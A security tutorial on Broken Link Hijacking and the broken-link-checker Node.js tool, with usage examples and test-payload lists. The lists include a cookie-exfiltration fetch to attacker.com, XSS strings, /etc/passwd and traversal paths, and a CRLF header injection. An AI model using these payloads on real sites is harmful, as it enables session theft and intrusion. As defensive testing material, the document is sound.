Broken Link Hijacking

Broken Link Hijacking (BLH) is an attack in which adversaries take over resources that a site still links to but no longer controls, such as expired domains, unclaimed social media handles, or outdated CDN endpoints. Once an attacker registers or repurposes the target of such a link, they can take control of assets, manipulate content, or run phishing campaigns.

Why is it a Security Risk?

When a linked resource is no longer controlled by its original owner, anyone who registers or repurposes it inherits the traffic and trust that the link carries. Attackers use this for phishing, malware distribution, session hijacking, and brand impersonation.

The risk grows in environments where outdated dependencies, external assets, or third-party integrations go unchecked. A single hijacked link can silently redirect users, steal credentials, or inject malicious scripts, compromising both security and trust.

Exploits of Broken Link Hijacking (BLH)

OAuth Token Interception – Attackers hijack expired OAuth redirect URIs to capture authentication tokens, enabling unauthorized API access and session hijacking.
Dependency Chain Injection – Reclaiming outdated third-party libraries allows adversaries to achieve remote code execution (RCE) and mount supply chain attacks.
Subdomain Takeover via Dangling DNS Records – Exploiting orphaned CNAME or A records to host malicious payloads, execute phishing attacks, or pivot into internal networks.
MX Record Hijacking for Email Spoofing – Taking control of decommissioned email domains to intercept password reset emails and facilitate spear-phishing.
Server-Side Request Forgery (SSRF) via API Endpoint Takeover – Manipulating abandoned API domains to force backend systems into unauthorized internal network access.
Malicious Redirection & SEO Poisoning – Exploiting broken external links to reroute traffic to phishing sites, deploy cryptojacking scripts, or manipulate search engine rankings.
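
Most of the exploits above start from a hostname that a site references but no longer controls. A first defensive step is to inventory every external hostname a page links to so that each one can be reviewed for ownership. The following is a minimal sketch using only Node's built-in URL class; `externalHosts` and the sample links are hypothetical names introduced for illustration.

```javascript
// Sketch: list external hostnames referenced by a page so each can be
// reviewed for ownership (expired domain, dangling DNS, abandoned CDN).
// `externalHosts` is an illustrative helper, not part of any library.
function externalHosts(pageUrl, links) {
  const pageHost = new URL(pageUrl).hostname;
  const hosts = new Map(); // hostname -> array of absolute links pointing at it
  for (const href of links) {
    let url;
    try {
      url = new URL(href, pageUrl); // resolve relative links against the page
    } catch {
      continue; // skip values that cannot be parsed as URLs
    }
    if (!/^https?:$/.test(url.protocol)) continue; // only web links
    if (url.hostname === pageHost) continue;       // internal link
    if (!hosts.has(url.hostname)) hosts.set(url.hostname, []);
    hosts.get(url.hostname).push(url.href);
  }
  return hosts;
}

const found = externalHosts('https://example.com/docs/', [
  '/about',
  'https://cdn.example.net/lib.js',
  'https://cdn.example.net/style.css',
  'mailto:admin@example.com',
]);
console.log([...found.keys()]);
```

Each hostname in the result can then be checked manually or with DNS and WHOIS tooling to confirm it is still registered to the expected owner.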

Broken Link Checker (BLC) is a powerful tool for detecting broken links in websites and local HTML files. It helps identify dead links, missing resources, and incorrect redirects to ensure optimal site health.

Installation

Prerequisites: Node.js version 14 or higher is required.

To install BLC globally, use:

npm install broken-link-checker -g

Usage

1. Command Line Usage

Once installed, check available options using:

blc --help

2. Site-wide Broken Link Scan:

blc http://yourwebsite.com -ro

3. Checking a Local HTML File:

blc path/to/index.html -ro

Note: HTTP proxies are not directly supported. If you face network issues, consider using a container with proxy settings.

4. Programmatic API Usage

To integrate BLC into your Node.js project, install it as a local dependency:

npm install broken-link-checker

BLC can then be used in scripts to automate broken link detection and to scan a site for broken links on a regular schedule.

Classes & Methods

BLC provides multiple classes for detecting and analyzing broken links.

SiteChecker: Recursively crawls an entire website.
HtmlUrlChecker: Scans the HTML content at each queued URL.
HtmlChecker: Scans an HTML document to detect broken links.
UrlChecker: Requests each queued URL to determine whether it is broken.

HtmlChecker – Scanning HTML for Broken Links

HtmlChecker scans an HTML document for broken links and emits relevant events.

Scanning an HTML Document

const { HtmlChecker } = require('broken-link-checker');

// Placeholder inputs: replace with your own options, markup, and base URL.
const options = {};
const html = '<a href="https://example.com/nonexistent-page">link</a>';
const baseURL = 'https://example.com/';

const htmlChecker = new HtmlChecker(options)
  .on('error', (error) => console.error('Scan Error:', error))
  .on('html', (tree, robots) => console.log('Parsed HTML:', tree))
  .on('queue', () => console.log('Queued links detected.'))
  .on('junk', (result) => console.log('Junk link found:', result.url.original))
  .on('link', (result) => console.log(`Checked link: ${result.url.original} - Status: ${result.broken ? 'Broken' : 'Valid'}`))
  .on('complete', () => console.log('Scan completed.'));

htmlChecker.scan(html, baseURL);

Methods & Properties

.clearCache() – Removes all cached URL responses.
.isPaused – Returns true if the queue is paused and false otherwise.
.numActiveLinks – Shows the number of links currently being checked.
.numQueuedLinks – Displays the number of links waiting in queue.
.pause() – Temporarily stops processing links.
.resume() – Resumes checking links if previously paused.
.scan(html, baseURL) – Starts scanning an HTML document for broken links.
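
The read-only properties above are enough to build a simple progress readout. The following is a small sketch under the assumption that the checker exposes `isPaused`, `numActiveLinks`, and `numQueuedLinks` exactly as listed; `progressSummary` and the stand-in object are hypothetical and exist only for illustration.

```javascript
// Sketch: summarize checker progress from the properties listed above.
// `checker` is any object exposing isPaused, numActiveLinks and numQueuedLinks.
function progressSummary(checker) {
  const state = checker.isPaused ? 'paused' : 'running';
  return `${state}: ${checker.numActiveLinks} active, ${checker.numQueuedLinks} queued`;
}

// Stand-in object for demonstration; a real checker instance would be passed instead.
const fakeChecker = { isPaused: false, numActiveLinks: 2, numQueuedLinks: 5 };
console.log(progressSummary(fakeChecker));
```

Calling such a helper from a timer gives a rough view of how much of a long scan remains.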

Events in Broken Link Detection

'complete' – Fires when all links are checked.
'error' – Fires if an error occurs in any event handler.
'html' – Fires when the document is fully parsed.
'junk' – Fires for skipped or unchecked links.
'link' – Fires for every checked link, whether broken or not.
'queue' – Fires when links are added to the queue.
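
To see how these events relate during a scan, it can help to count them. The sketch below attaches counters to any EventEmitter using the event names listed above; it is demonstrated on a plain stand-in emitter rather than on BLC itself, and `tallyEvents` is a hypothetical helper name.

```javascript
const { EventEmitter } = require('events');

// Sketch: count how often each event fires on a checker-like emitter.
// `tallyEvents` is an illustrative helper; the event names come from the list above.
function tallyEvents(emitter, names = ['complete', 'error', 'html', 'junk', 'link', 'queue']) {
  const counts = Object.fromEntries(names.map((name) => [name, 0]));
  for (const name of names) {
    emitter.on(name, () => { counts[name] += 1; });
  }
  return counts; // live object, updated as events arrive
}

// Stand-in emitter used only to demonstrate the helper.
const demo = new EventEmitter();
const counts = tallyEvents(demo);
demo.emit('html');
demo.emit('link', { broken: false });
demo.emit('link', { broken: true });
demo.emit('junk', {});
demo.emit('complete');
console.log(counts);
```

Because the checker classes are event emitters, the same helper could in principle be attached to a checker instance before calling its scan method.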

Payloads for Injecting Invalid URLs

https://[invalid].example.com → Tests handling of malformed domains.
http://127.0.0.1:9999 → Checks for misconfigured localhost links.
ftp://ftp.example.com/brokenfile.txt → Tests FTP link validation.
file:///etc/passwd → Verifies handling of local file system links.
https://nonexistent.example.com/404 → Simulates a dead link scenario.

Payloads for Testing Redirections & Loops

http://redirect-me.com -> http://final-destination.com → Detects valid redirects.
http://loop.example.com -> http://loop.example.com → Identifies infinite redirect loops.
https://fake-redirect.com/malware → Tests phishing/malicious redirects.
http://expired-domain.com → Simulates abandoned domain issues.
https://cdn.invalid-resource.com/script.js → Checks outdated CDN references.

Payloads for JavaScript-Based Links

<a href="javascript:alert('XSS')">Click</a> → Detects inline JavaScript.
<a href="data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4=">Base64</a> → Encodes payloads in data: URLs.
window.location='http://malicious.com' → Simulates forced redirection.
fetch('http://attacker.com/leak?cookie='+document.cookie) → Checks for unauthorized data exfiltration.
<a href="#" onclick="document.write('<iframe src=\'http://evil.com\'>')">Click</a> → Tests for iframe injections
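
The payloads above differ mainly in their URL scheme, and the scheme largely determines whether a link can be requested at all. As a rough sketch, the helper below sorts a URL into a handling category using Node's built-in URL parser; the category names and `classifyScheme` itself are assumptions made for illustration, not BLC behavior.

```javascript
// Sketch: decide how a link checker might treat a URL based on its scheme.
// The categories and the `classifyScheme` name are illustrative assumptions.
function classifyScheme(href) {
  let protocol;
  try {
    protocol = new URL(href).protocol;
  } catch {
    return 'unparseable'; // not an absolute URL the parser accepts
  }
  if (protocol === 'http:' || protocol === 'https:') return 'checkable';
  if (protocol === 'javascript:' || protocol === 'data:') return 'script-or-inline';
  if (protocol === 'file:') return 'local-file';
  return 'other';
}

for (const sample of [
  'https://nonexistent.example.com/404',
  "javascript:alert('XSS')",
  'file:///etc/passwd',
  'ftp://ftp.example.com/brokenfile.txt',
]) {
  console.log(sample, '->', classifyScheme(sample));
}
```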

HtmlUrlChecker Scanning

Scans the HTML content at each queued URL to find broken links. All methods from EventEmitter are available.

General Broken Link Payloads

https://example.com/nonexistent-page – Tests 404 responses.
https://example.com/500-error – Simulates a server-side error.
http://example.com:9999/ – Checks response from non-standard ports.
https://expired-ssl.example.com – Tests handling of expired SSL certificates.
https://self-signed.example.com – Simulates a self-signed SSL certificate.
ftp://example.com/missing-file.txt – Checks broken FTP links.
file:///etc/passwd – Tests handling of local file access in URLs.
https://example.com/timeout – Simulates a slow response leading to timeouts.

Redirect Testing Payloads

http://example.com/redirect-loop → http://example.com/redirect-loop – Detects infinite loops.
http://example.com/redirect?target=http://malicious.com – Tests open redirects.
https://www.example.com/moved → https://new.example.com/ – Tests proper handling of permanent redirects (301/308).
https://example.com/temp-redirect → https://another-site.com – Ensures handling of temporary redirects (302/307).
https://evil.com/hidden-redirect → https://phishing.com/login – Checks malicious redirect detection.
http://example.com/redirect-without-trailing/ → http://example.com/redirect-with-trailing/ – Tests URL inconsistency.
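
The loop and chain cases above can be reasoned about without any network traffic. The sketch below walks a redirect chain described by a plain lookup table and reports loops or overly long chains; `traceRedirects`, the table, and the hop limit of 10 are hypothetical choices for illustration.

```javascript
// Sketch: follow a chain of redirects described by a lookup table and
// report loops or overly long chains. No network requests are made.
function traceRedirects(start, redirects, maxHops = 10) {
  const seen = new Set([start]);
  const chain = [start];
  let current = start;
  while (redirects.has(current)) {
    if (chain.length - 1 >= maxHops) {
      return { status: 'too-many-hops', chain };
    }
    current = redirects.get(current);
    if (seen.has(current)) {
      return { status: 'loop', chain: [...chain, current] };
    }
    seen.add(current);
    chain.push(current);
  }
  return { status: 'ok', chain };
}

// Illustrative table: source URL -> redirect target.
const table = new Map([
  ['http://example.com/redirect-loop', 'http://example.com/redirect-loop'],
  ['https://www.example.com/moved', 'https://new.example.com/'],
]);
const loopResult = traceRedirects('http://example.com/redirect-loop', table);
const movedResult = traceRedirects('https://www.example.com/moved', table);
console.log(loopResult.status, movedResult.status);
```

Tracking visited URLs in a set catches loops of any length, while the hop limit bounds chains that never repeat.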

JavaScript-Based Link Payloads

<a href="javascript:void(0)">Broken JS Link</a> – Checks for non-functional JavaScript links.
<a href="javascript:alert('Test')">Click me</a> – Detects inline JavaScript execution.
<script>window.location.href='http://malicious.com'</script> – Simulates forced redirection via JavaScript.
<img src="javascript:alert('XSS')"> – Tests execution of JavaScript in image tags.
<iframe src="javascript:void(0)"></iframe> – Identifies hidden iframe injections.
<script>document.write('<a href="http://bad.com">Malicious Link</a>')</script> – Ensures dynamic script-injected links are detected.

Obfuscated & Encoded Links

http://%77%77%77%2E%65%78%61%6D%70%6C%65%2E%63%6F%6D/hidden – Tests percent-encoded links.
http://example.com/?q=<script>alert('XSS')</script> – Detects XSS vulnerabilities.
data:text/html;base64,PHNjcmlwdD5hbGVydCgnSGFja2VkIScpPC9zY3JpcHQ+ – Checks for base64-encoded payloads.
//evil.com/malware.js – Tests handling of scheme-relative links.
http://user:pass@evil.com – Tests credential leaks in URLs.
javascript:void(document.location='http://malicious.com') – Simulates JavaScript-based navigation.
<iframe src="https://malicious.com/hidden.html"></iframe> – Checks for hidden iframes.
http://evil.com/%252e%252e/%252e%252e/%252e%252e/etc/passwd – Detects directory traversal attempts.
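
Several of the payloads above rely on encoding layers or on parts of the URL that are easy to overlook. A minimal sketch of two checks follows: one undoes repeated percent-encoding, the other flags embedded credentials. Both helper names are hypothetical, and the limit of five decoding rounds is an arbitrary assumption.

```javascript
// Sketch: undo repeated percent-encoding and flag embedded credentials.
// `fullyDecode` and `hasCredentials` are illustrative helper names.
function fullyDecode(text, maxRounds = 5) {
  let current = text;
  for (let i = 0; i < maxRounds; i += 1) {
    let next;
    try {
      next = decodeURIComponent(current);
    } catch {
      break; // malformed escape sequence: keep the last good value
    }
    if (next === current) break; // nothing left to decode
    current = next;
  }
  return current;
}

function hasCredentials(href) {
  const url = new URL(href);
  return url.username !== '' || url.password !== '';
}

console.log(fullyDecode('%252e%252e/%252e%252e/etc/passwd'));
console.log(hasCredentials('http://user:pass@evil.com'));
```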

Broken Image & Media Links

<img src="http://example.com/broken.jpg"> – Tests missing image files.
<audio src="http://example.com/missing.mp3" controls></audio> – Detects broken audio links.
<video src="http://example.com/nonexistent.mp4" controls></video> – Ensures missing video files are identified.
<embed src="http://example.com/missing.swf"> – Checks obsolete Flash content.
<iframe src="http://example.com/missing.html"></iframe> – Detects broken iframe content.

API & Dynamic Link Testing

https://api.example.com/v1/data – Tests valid API endpoint handling.
https://api.example.com/v1/404 – Simulates API returning a 404 error.
https://api.example.com/v1/error – Detects API failures and incorrect responses.
https://cdn.example.com/missing.js – Tests handling of missing JavaScript libraries.
https://example.com/api?token=12345 – Ensures sensitive tokens in URLs are flagged.
https://example.com/search?q=<script>alert('XSS')</script> – Tests search parameter sanitization.
http://example.com/%0D%0ASet-Cookie:%20auth=steal – Checks for HTTP header injection.
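
Two of the cases above, tokens in query strings and encoded line breaks, can be flagged with simple string and URL inspection. The sketch below is one possible approach; the list of sensitive parameter names is an assumption to be adapted, and both function names are hypothetical.

```javascript
// Sketch: flag query parameters whose names suggest secrets, and detect
// encoded CR/LF sequences that could enable header injection.
// The parameter-name list is an assumption and should be adapted.
const SENSITIVE_NAMES = ['token', 'api_key', 'apikey', 'password', 'secret'];

function sensitiveParams(href) {
  const url = new URL(href);
  return [...url.searchParams.keys()].filter((key) =>
    SENSITIVE_NAMES.includes(key.toLowerCase()));
}

function hasEncodedCrlf(href) {
  return /%0d|%0a/i.test(href); // matches percent-encoded CR or LF
}

console.log(sensitiveParams('https://example.com/api?token=12345'));
console.log(hasEncodedCrlf('http://example.com/%0D%0ASet-Cookie:%20auth=steal'));
```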

SiteChecker

Recursively scans (crawls) the HTML content at each queued URL to find broken links.

const { SiteChecker } = require('broken-link-checker');

const siteChecker = new SiteChecker(options)
  .on('error', (error) => { console.log('Error:', error); })
  .on('robots', (robots, customData) => { console.log('Robots.txt Found:', robots.directives); })
  .on('html', (tree, robots, response, pageURL, customData) => { console.log('HTML Scanned:', pageURL); })
  .on('queue', () => { console.log('Queue Updated'); })
  .on('junk', (result, customData) => { console.log('Junk Link:', result.url.original); })
  .on('link', (result, customData) => { console.log('Checked Link:', result.url.original, 'Status:', result.broken ? 'Broken' : 'Valid'); })
  .on('page', (error, pageURL, customData) => { console.log('Page Scanned:', pageURL, 'Error:', error ? error.message : 'None'); })
  .on('site', (error, siteURL, customData) => { console.log('Site Crawled:', siteURL, 'Error:', error ? error.message : 'None'); })
  .on('end', () => { console.log('Crawl Complete'); });

Large-scale websites

siteChecker.enqueue("https://wikipedia.org", customData);
siteChecker.enqueue("https://github.com", customData);
siteChecker.enqueue("https://amazon.com", customData);

siteChecker.enqueue("https://facebook.com", customData);
siteChecker.enqueue("https://linkedin.com", customData);

Sites with redirects

siteChecker.enqueue("http://example.com/redirect", customData);
siteChecker.enqueue("https://t.co/test", customData);

API endpoints (JSON responses)

siteChecker.enqueue("https://api.example.com/data", customData);
siteChecker.enqueue("https://jsonplaceholder.typicode.com/posts", customData);

URLs with special characters

siteChecker.enqueue("https://example.com/?search=<script>alert(1)</script>", customData);
siteChecker.enqueue("https://example.com/-secure-page", customData);
siteChecker.enqueue("https://example.com/üñîçødë", customData);

Local network testing

siteChecker.enqueue("http://127.0.0.1", customData);
siteChecker.enqueue("http://localhost:8080", customData);

Edge cases (Invalid or malformed URLs)

siteChecker.enqueue("https://invalid-url", customData);
siteChecker.enqueue("https://test[.]com", customData);

File URLs (Expected to fail)

siteChecker.enqueue("file://localhost", customData);

Hidden/obscured links

siteChecker.enqueue("https://example.com/#hidden-section", customData);

Mixed content sites (HTTP links on HTTPS sites)

siteChecker.enqueue("https://secure-site.com/http-content", customData);
siteChecker.enqueue("http://insecure-site.com", customData);
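
For the mixed-content case, the links collected from a page can be filtered after the crawl. The following sketch returns the plain-HTTP links found on an HTTPS page; `mixedContentLinks` is a hypothetical helper, and the input list stands in for URLs gathered from 'link' events.

```javascript
// Sketch: given an HTTPS page and the links found on it, return the links
// that would load over plain HTTP. `mixedContentLinks` is illustrative.
function mixedContentLinks(pageUrl, links) {
  if (new URL(pageUrl).protocol !== 'https:') return []; // only HTTPS pages qualify
  return links.filter((href) => {
    try {
      return new URL(href, pageUrl).protocol === 'http:';
    } catch {
      return false; // ignore values that cannot be parsed
    }
  });
}

const insecure = mixedContentLinks('https://secure-site.com/http-content', [
  'http://insecure-site.com',
  '/local',
  'https://ok.example.com',
]);
console.log(insecure);
```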

UrlChecker

Requests each queued URL to determine whether it is broken.

const { UrlChecker } = require('broken-link-checker');

const urlChecker = new UrlChecker(options)
  .on('error', (error) => { console.log('Error:', error); })
  .on('queue', () => { console.log('Queue Updated'); })
  .on('link', (result, customData) => { console.log('Checked URL:', result.url.original, 'Status:', result.broken ? 'Broken' : 'Valid'); })
  .on('end', () => { console.log('URL Checking Complete'); });

Common Websites

const commonSites = [
  "https://google.com",
  "https://github.com",
  "https://linkedin.com",
  "https://twitter.com/login"
];

Redirects & Shortened Links

const redirectShortLinks = [
  "http://example.com/redirect",
  "https://bit.ly/3kz"
];

API Endpoints

const apiEndpoints = [
  "https://api.github.com/users/octocat",
  "https://jsonplaceholder.typicode.com/todos/1"
];

XSS & Special Character Injection

const xssPayloads = [
  "https://example.com/?search=<script>alert(1)</script>",
  "https://example.com/üñîçødë",
  "https://example.com/-secure-url"
];

Local & Internal Network URLs

const localNetworkUrls = [
  "http://127.0.0.1",
  "http://localhost:3000"
];

Invalid & Malformed URLs

const invalidUrls = [
  "https://invalid-url",
  "https://test[.]com",
  "file://localhost"
];

Hidden Anchors & Mixed Content

const mixedContentUrls = [
  "https://example.com/#hidden-section",
  "https://secure-site.com/http-content",
  "http://insecure-site.com"
];

Nonexistent Domains

const nonexistentDomains = [
  "https://thiswebsitedoesnotexist.tld",
  "http://randomnotarealwebsite123456789.com"
];

Deeply Nested & Parameterized URLs

const deepUrls = [
  "https://example.com/very/deeply/nested/path/to/a/file.html",
  "https://example.com/?id=123&name=test",
  "https://example.com/?param1=<script>alert(1)</script>",
  "https://example.com/",
  "https://example.com/.html"
];

Enqueue URLs for checking

const payloadCategories = [
  commonSites,
  redirectShortLinks,
  apiEndpoints,
  xssPayloads,
  localNetworkUrls,
  invalidUrls,
  mixedContentUrls,
  nonexistentDomains,
  deepUrls
];

payloadCategories.flat().forEach(url => urlChecker.enqueue(url, {}));
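
When the payload lists grow, it may be useful to separate URLs that parse from those that do not before enqueuing, so that malformed entries can be reported on their own. The sketch below does this with Node's URL parser and removes duplicates along the way; `prepareUrls` is a hypothetical helper and is not part of BLC.

```javascript
// Sketch: flatten payload categories, drop duplicates, and split entries
// into parseable and unparseable URLs. `prepareUrls` is illustrative.
function prepareUrls(categories) {
  const valid = new Set();
  const rejected = [];
  for (const href of categories.flat()) {
    try {
      valid.add(new URL(href).href); // normalized form; the Set removes duplicates
    } catch {
      rejected.push(href);
    }
  }
  return { valid: [...valid], rejected };
}

const prepared = prepareUrls([
  ['https://example.com', 'https://example.com/'],
  ['not a url'],
]);
console.log(prepared);
```

The `valid` list can be enqueued as before, while `rejected` records which payloads never reached the checker.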

Handling Broken/Excluded Links

A broken link has an isBroken value of true and a reason code in brokenReason. A link that was not checked (emitted as 'junk') has a wasExcluded value of true, a reason code in excludedReason, and an isBroken value of null.

Checking Broken Links

if (link.get('isBroken')) {
  console.log(`Broken Link Reason: ${link.get('brokenReason')}`);
  console.log(`URL: ${link.get('url.original')}`);
  console.log(`HTTP Status Code: ${link.get('http.responseCode')}`);
  console.log(`Response Message: ${link.get('http.responseMessage')}`);
}

Checking Excluded Links

// Excluded links have isBroken === null, so this check can stand alone.
if (link.get('wasExcluded')) {
  console.log(`Excluded Link Reason: ${link.get('excludedReason')}`);
  console.log(`URL: ${link.get('url.original')}`);
}

Descriptive Messages for Reason Codes

const { reasons } = require('broken-link-checker');

// Each reason code maps to a human-readable message.
console.log(`Robots Exclusion: ${reasons.BLC_ROBOTS}`);
console.log(`Connection Reset: ${reasons.ERRNO_ECONNRESET}`);
console.log(`Page Not Found: ${reasons.HTTP_404}`);
console.log(`Timeout Error: ${reasons.ERRNO_ETIMEDOUT}`);
console.log(`Too Many Redirects: ${reasons.HTTP_310}`);
console.log(reasons); // full table of codes and messages

Broken Link Handling

if (link.get('isBroken')) {
  console.log(`URL: ${link.get('url.original')}`);
  console.log(`Broken Reason: ${reasons[link.get('brokenReason')]}`);
  console.log(`HTTP Code: ${link.get('http.responseCode')}`);
  console.log(`Response Time: ${link.get('http.responseTime')} ms`);
  console.log(`Final Redirected URL: ${link.get('url.redirected')}`);
}

Advanced Excluded Link Handling

// Excluded links have isBroken === null, so this check can stand alone.
if (link.get('wasExcluded')) {
  console.log(`URL: ${link.get('url.original')}`);
  console.log(`Excluded Reason: ${reasons[link.get('excludedReason')]}`);
}
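
The broken and excluded checks can be folded into one reporting function. The sketch below assumes only that a link exposes a `get(key)` method with the keys used above; `describeLink` is a hypothetical helper, and the Map-based stand-in replaces a real link object for demonstration.

```javascript
// Sketch: turn a checked link into a one-line report. `link` is any object
// with a get(key) method; `reasons` maps reason codes to messages.
function describeLink(link, reasons = {}) {
  const url = link.get('url.original');
  if (link.get('isBroken')) {
    const code = link.get('brokenReason');
    return `BROKEN ${url} (${reasons[code] || code})`;
  }
  if (link.get('wasExcluded')) {
    const code = link.get('excludedReason');
    return `SKIPPED ${url} (${reasons[code] || code})`;
  }
  return `OK ${url}`;
}

// Stand-in link built from a Map, for demonstration only.
const fakeLink = new Map([
  ['url.original', 'https://example.com/nonexistent-page'],
  ['isBroken', true],
  ['brokenReason', 'HTTP_404'],
]);
console.log(describeLink(fakeLink, { HTTP_404: 'Not Found (404)' }));
```

Falling back to the raw code when no message is found keeps the report useful even for reason codes missing from the table.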

Configuration Options

General Settings

cacheMaxAge: 3600000 – How long a cached response remains valid, in milliseconds.
cacheResponses: true – Enables caching of URL request results.
rateLimit: 0 – Delay before each request, in milliseconds.
userAgent: "broken-link-checker/0.8.0 Node.js/14.16.0 (OS X; x64)" – HTTP user-agent string sent with requests.

Filtering Options

excludedKeywords: [] – Excludes links matching specific keywords or patterns.
includedKeywords: [] – Checks only links matching the specified keywords.
excludeExternalLinks: false – When true, external links are not checked.
excludeInternalLinks: false – When true, internal links are not checked.
excludeLinksToSamePage: false – When true, links to the same page are not checked.
filterLevel: 1 – Determines which tags and attributes are considered links.

Robots & Crawling

honorRobotExclusions: true – Prevents scanning pages disallowed by robots.txt or meta tags.
includeLink: link => true – Custom function to include or exclude links.
includePage: url => true – Custom function to include or exclude pages.

Request & Connection Limits

maxSockets: Infinity – Maximum number of simultaneous link checks.
maxSocketsPerHost: 2 – Limits concurrent requests per host to prevent overload.
requestMethod: "head" – HTTP request method used for checking links.
retryHeadCodes: [405] – List of HTTP status codes that trigger a retry.
retryHeadFail: true – Retries failed 'head' requests with a 'get' request.

Error Handling & Debugging

logErrors: true – Enables logging of request errors.
debugMode: false – Allows additional debugging output.
timeout: 5000 – Request timeout duration in milliseconds.
retryOnTimeout: true – Reattempts requests if they time out.

Advanced Settings

checkRedirects: true – Verifies whether redirects are functional.
followRedirects: true – Follows HTTP redirects automatically.
ignoreSSL: false – Enforces SSL certificate validation.
maxRetries: 3 – Number of retry attempts for failed requests.
batchSize: 10 – Number of URLs processed simultaneously.
customHeaders: {} – Custom HTTP headers sent with requests.
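
Options are typically passed as a single object to a checker's constructor. One way to keep overrides explicit is to merge them onto a set of defaults and reject misspelled keys. The following sketch copies a handful of option names and default values from the settings listed above; `buildOptions` is a hypothetical helper and not part of BLC.

```javascript
// Sketch: merge caller overrides onto a set of defaults. The option names and
// default values are copied from the settings listed above; `buildOptions` is
// an illustrative helper.
const DEFAULT_OPTIONS = {
  cacheMaxAge: 3600000,
  cacheResponses: true,
  excludeExternalLinks: false,
  filterLevel: 1,
  honorRobotExclusions: true,
  maxSocketsPerHost: 2,
  rateLimit: 0,
  requestMethod: 'head',
};

function buildOptions(overrides = {}) {
  // Reject keys that are not in the defaults to catch typos early.
  const unknown = Object.keys(overrides).filter((key) => !(key in DEFAULT_OPTIONS));
  if (unknown.length > 0) {
    throw new Error(`Unknown option(s): ${unknown.join(', ')}`);
  }
  return { ...DEFAULT_OPTIONS, ...overrides };
}

const politeOptions = buildOptions({ rateLimit: 500, maxSocketsPerHost: 1 });
console.log(politeOptions);
```

The resulting object could then be handed to a checker constructor in place of `options` in the earlier examples.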